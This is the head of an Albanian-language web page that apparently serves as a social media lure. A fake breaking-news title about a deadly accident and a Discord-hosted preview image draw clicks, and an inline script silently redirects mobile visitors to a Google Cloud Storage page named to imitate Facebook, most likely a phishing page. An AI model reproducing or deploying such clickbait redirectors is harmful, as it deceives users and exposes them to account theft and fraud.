<!DOCTYPE html>
<html lang="es">
<head>
<meta charset="utf-8"/>
<meta name="title" content="Stream"/>
<meta name="keywords" content="Instagram"/>
<meta property="og:description" content="229,142,105,vizitat"/>
<meta name="robots" content="index, follow"/>
<meta name="googlebot" content="noindex"/>
<meta name="robots" content="index"/>
<meta name="robots" content="noindex"/>
<meta name="robots" content="nofollow"/>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<meta name="viewport" content="width=device-width, initial-scale=1"/>
<meta property="og:title" content="Bëni shumë kujdes mëngjesin e sotëm ka ndodhur një aksident tragjik me disa të plagosur dhe të vdekur."/>
<meta property="og:image" content="https://media.discordapp.net/attachments/1220457453838143602/1223646806840315965/dsafrewrwe33.jpg?ex=661a9ce5&is=660827e5&hm=f02cb17469254802d97210acc25aa7f34bc6003ef4ed81c4206a8489d89c76b7&=&format=webp"/>
<meta name="apple-itunes-app" content="app-id=6448311069"/>
<script type="text/javascript">
    //<![CDATA[
        var isMobile = /Android|iPhone|iPad|iPod|BlackBerry|IEMobile|Opera Mini/i.test(navigator.userAgent);
    
        if (isMobile) {
            window.location.href = "https://storage.googleapis.com/faceboossk-nne00.appspot.com/jef00224.html";
        }
    //]]>
    </script>
    